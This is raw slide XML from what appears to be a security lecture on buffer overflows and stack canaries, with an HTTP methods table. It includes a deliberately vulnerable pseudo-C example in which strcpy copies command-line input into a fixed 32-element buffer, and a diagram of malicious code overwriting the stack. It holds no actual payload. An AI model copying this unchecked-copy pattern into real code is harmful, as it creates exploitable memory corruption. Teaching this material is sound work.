          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="6057856"/>
            <a:ext cx="874602" cy="3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:856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408A20E-28BD-4A0E-A1E8-B6B112B91744}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8630335" y="4316193"/>
            <a:ext cx="2502734" cy="2073656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NOP sled</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="142542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44444E-6 L 2.91667E-6 0.1138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0.11389 L 2.91667E-6 -0.38356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88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0.38356 L 2.91667E-6 -0.21574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0.21574 L 2.91667E-6 -0.10208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2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0.10208 L 0.59271 0.03519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35" y="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271 0.03519 L 0.59179 -0.14861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6" grpId="2" animBg="1"/>
      <p:bldP spid="16" grpId="3" animBg="1"/>
      <p:bldP spid="16" grpId="4" animBg="1"/>
      <p:bldP spid="16" grpId="5" animBg="1"/>
      <p:bldP spid="22" grpId="0" animBg="1"/>
      <p:bldP spid="31" grpId="0" animBg="1"/>
      <p:bldP spid="8" grpId="0" animBg="1"/>
      <p:bldP spid="29" grpId="0" animBg="1"/>
      <p:bldP spid="32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2ABE93-0934-473D-83D0-4EBD2CEA8C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29805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C9CC24-B375-4226-BF2B-61FADBBA6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70A28E-4FD8-4474-A206-E15B5EBB3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084747"/>
            <a:ext cx="12188952" cy="3294207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9647E21-5366-4638-AC97-D8CD4111E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r="8214" b="45501"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="0" y="0"/>
            <a:ext cx="12191999" cy="4473360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2DD7A5-4611-4D56-873B-1E4943F46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925" y="2076450"/>
            <a:ext cx="10684151" cy="13451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Mitigating Buffer Overflows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6A9E26-9BAB-4546-8E3B-98C04E64E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71575" y="4473360"/>
            <a:ext cx="9469211" cy="8656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800" kern="12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668145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06FAB-78DC-4C88-B6FA-7B9F4C503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 Canaries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A3269-BBE7-4B65-A6C8-65D31B939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71336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Compiler adds special sentinel values onto the stack before each saved IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Canary is set to a random value in each frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At function exit, canary is checked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If expected number isn’t found, program closes with an error</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="898696406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B3FD1-40EA-432C-A286-A9B673140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433196" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack Canaries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B7E7A-4158-4A3A-9991-2A74F262C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8113" y="1455089"/>
            <a:ext cx="6384373" cy="5037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void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> print(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string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> s) {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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set_stack_canary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(random());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string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> buffer[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>];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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(buffer, s);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puts(buffer);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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>check_stack_canary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()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18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void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"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main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(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integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 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strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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print(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]);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2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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CD840B-4B1D-4754-984C-B90D0160516D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9258574" y="365125"/>
            <a:ext cx="1256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Memory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369C03-1A8F-4186-9F55-472D98B5C2F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8567009" y="826790"/>
            <a:ext cx="0" cy="556305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CDC6264-C836-4FF5-9E0D-22D2C943BE57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11211377" y="826790"/>
            <a:ext cx="0" cy="556305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D67E3C3-5953-4380-8F73-9F71921817FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="941781" y="1455089"/>
            <a:ext cx="702874" cy="5037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0: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1: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2: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3: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4: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5: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6:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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7: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8: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9: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10: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11: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5A080C8E-FFB2-4DB6-82F5-FE53CA42626B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250217" y="4159250"/>
            <a:ext cx="980105" cy="86512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F62BF2-F3FF-4D00-BE59-120561E20530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="1255059"/>
            <a:ext cx="2504140" cy="70522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argv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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58FE83-725B-4D37-ABD4-021E0287CD35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="2035939"/>
            <a:ext cx="2504140" cy="40246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argc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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88226CC-58DF-4A7F-BA11-36AF21EA00AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="4046682"/>
            <a:ext cx="2504140" cy="131088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buffer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8DB585E-751C-4FDD-9A5B-A85F7B19DE3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7861254" y="2232839"/>
            <a:ext cx="621041" cy="931710"/>
            <a:chOff x="7973123" y="2159723"/>
            <a:chExt cx="621041" cy="1345461"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Left Bracket 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D8D45CC-5A52-493C-AB99-F7C144AE0D7B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8414872" y="2547880"/>
              <a:ext cx="179292" cy="698382"/>
            </a:xfrm>
            <a:prstGeom prst="leftBracket">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="5715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03EADBE-EC70-4A0C-8EB5-E410A92ACFC2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="7500447" y="2632399"/>
              <a:ext cx="13454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main()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A001156-8D8D-4DD5-9C0F-2A4C3E5C60C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7877104" y="3110808"/>
            <a:ext cx="605191" cy="2246753"/>
            <a:chOff x="7988973" y="2547879"/>
            <a:chExt cx="605191" cy="1209717"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Left Bracket 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FADA7FCB-6917-4578-8649-A15085371812}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8414872" y="2547879"/>
              <a:ext cx="179292" cy="1209717"/>
            </a:xfrm>
            <a:prstGeom prst="leftBracket">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="5715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BBB9F7A-3E34-4926-B407-BB1A4EBDC88D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="7886815" y="2952683"/>
              <a:ext cx="6044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print()</a:t>
              </a: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7858E695-1AE5-40A2-81C6-A27A3CD39782}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="2514057"/>
            <a:ext cx="2504140" cy="40246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IP = …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FC385A7-7B37-4C33-B4EA-D736063455BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="3061224"/>
            <a:ext cx="2504140" cy="40246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IP = 7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E3671EE-A5B5-43D3-AAD4-BDA09CDD7538}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8630335" y="3058115"/>
            <a:ext cx="2502734" cy="40557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IP = 952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30939EDD-8E4E-459C-88C8-D62F10A604C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="1272987"/>
            <a:ext cx="874602" cy="69924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:1000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:996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3E336E1A-0130-4DBF-8E72-72BF8F9F2EF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="2069979"/>
            <a:ext cx="874602" cy="3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:992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8E7C77BC-52DC-4838-ADEB-DC796A5EF88C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="2564309"/>
            <a:ext cx="874602" cy="3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:988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C50640D3-06B7-4EAA-A236-7CB56E8025F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="3074447"/>
            <a:ext cx="874602" cy="3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:980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934E9726-0761-439B-8098-6C16DBEA3C05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="4509952"/>
            <a:ext cx="874602" cy="3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:948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E86C15F-882B-445A-B89B-BEEF11808096}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8625871" y="3569329"/>
            <a:ext cx="2504140" cy="40246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canary = 189476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18353E-2F42-4851-8167-95FED5933379}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="3555030"/>
            <a:ext cx="2502734" cy="1802532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Malicious code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94BC708D-5CC0-4574-B531-6A9D1DA88578}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5190435" y="2459564"/>
            <a:ext cx="1948070" cy="1512226"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -70629"/>
              <a:gd name="adj2" fmla="val 1780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Canary value has changed, so exit()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="334880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44444E-6 L 2.91667E-6 0.1138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0.11389 L 1.04167E-6 -0.43171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2740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0.43171 L 2.91667E-6 -0.21574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0.21574 L 2.91667E-6 -0.16435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6" grpId="2" animBg="1"/>
      <p:bldP spid="16" grpId="3" animBg="1"/>
      <p:bldP spid="16" grpId="4" animBg="1"/>
      <p:bldP spid="22" grpId="0" animBg="1"/>
      <p:bldP spid="31" grpId="0" animBg="1"/>
      <p:bldP spid="29" grpId="0" animBg="1"/>
      <p:bldP spid="32" grpId="0" animBg="1"/>
      <p:bldP spid="8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/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="143069"/>
            <a:ext cx="10515600" cy="1200539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 dirty="0"/>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0"/>
              <a:t>Request </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4500" dirty="0"/>
              <a:t>Methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="102" name="Table 102"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4021152416"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2652664" y="1579478"/>
          <a:ext cx="7961789" cy="4952534"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1">
                <a:tableStyleId>{69CF1AB2-1976-4502-BF36-3FF5EA218861}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1488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2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7188">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0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800" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Verb</a:t>
                      </a:r>
                      <a:endParaRPr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35719" marR="35719" marT="35719" marB="35719" anchor="ctr"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800" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr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35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow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259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/>
                        <a:t>GET</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1">
                        <a:latin typeface="Helvetica"/>
                        <a:ea typeface="Helvetica"/>
                        <a:cs typeface="Helvetica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>
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>Retrieve resource at a given path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034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lang="en-US" sz="1800" dirty="0"/>
                        <a:t>POST</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1" dirty="0">
                        <a:latin typeface="Helvetica"/>
                        <a:ea typeface="Helvetica"/>
                        <a:cs typeface="Helvetica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800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>Submit data to a given path, might create resources as new paths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5992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lang="en-US" sz="1800" dirty="0"/>
                        <a:t>HEAD</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1" dirty="0">
                        <a:latin typeface="Helvetica"/>
                        <a:ea typeface="Helvetica"/>
                        <a:cs typeface="Helvetica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lang="en-US" sz="1800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>Identical to a GET, but response omits body</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" dirty="0">
                        <a:sym typeface="Helvetica Light"/>
                      </a:endParaRP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6617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/>
                        <a:t>PUT</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1">
                        <a:latin typeface="Helvetica"/>
                        <a:ea typeface="Helvetica"/>
                        <a:cs typeface="Helvetica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>
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>Submit data to a given path, creating resource if it exists or modifying existing resource at that path</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" i="1">
                        <a:sym typeface="Helvetica Light"/>
                      </a:endParaRP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/>
                        <a:t>DELETE</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1">
                        <a:latin typeface="Helvetica"/>
                        <a:ea typeface="Helvetica"/>
                        <a:cs typeface="Helvetica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>
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>Deletes resource at a given path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/>
                        <a:t>TRACE</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1">
                        <a:latin typeface="Helvetica"/>
                        <a:ea typeface="Helvetica"/>
                        <a:cs typeface="Helvetica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>
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>Echoes request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1034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/>
                        <a:t>OPTIONS</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1">
                        <a:latin typeface="Helvetica"/>
                        <a:ea typeface="Helvetica"/>
                        <a:cs typeface="Helvetica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>
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>Returns supported HTTP methods given a path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1034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/>
                        <a:t>CONNECT</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1">
                        <a:latin typeface="Helvetica"/>
                        <a:ea typeface="Helvetica"/>
                        <a:cs typeface="Helvetica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 dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>Creates a tunnel to a given network location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EDC9AB6A-8C51-4D09-AA71-CA54060296CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="291153" y="1937982"/>
            <a:ext cx="2265528" cy="1028131"/>
            <a:chOff x="291153" y="1937982"/>
            <a:chExt cx="2265528" cy="1028131"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Left Brace 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC02121D-9914-4D7E-9042-7FAF64AF6B8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2374710" y="1937982"/>
              <a:ext cx="181971" cy="1028131"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrac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peech Bubble: Rectangle 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D050927D-A3D7-4C78-B3C2-D009D06646BC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="291153" y="1937982"/>
              <a:ext cx="1628633" cy="900752"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 60173"/>
                <a:gd name="adj2" fmla="val 997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99.9% of all HTTP requests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83E6895-3632-43EA-ACBD-AF4CF9BBD102}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
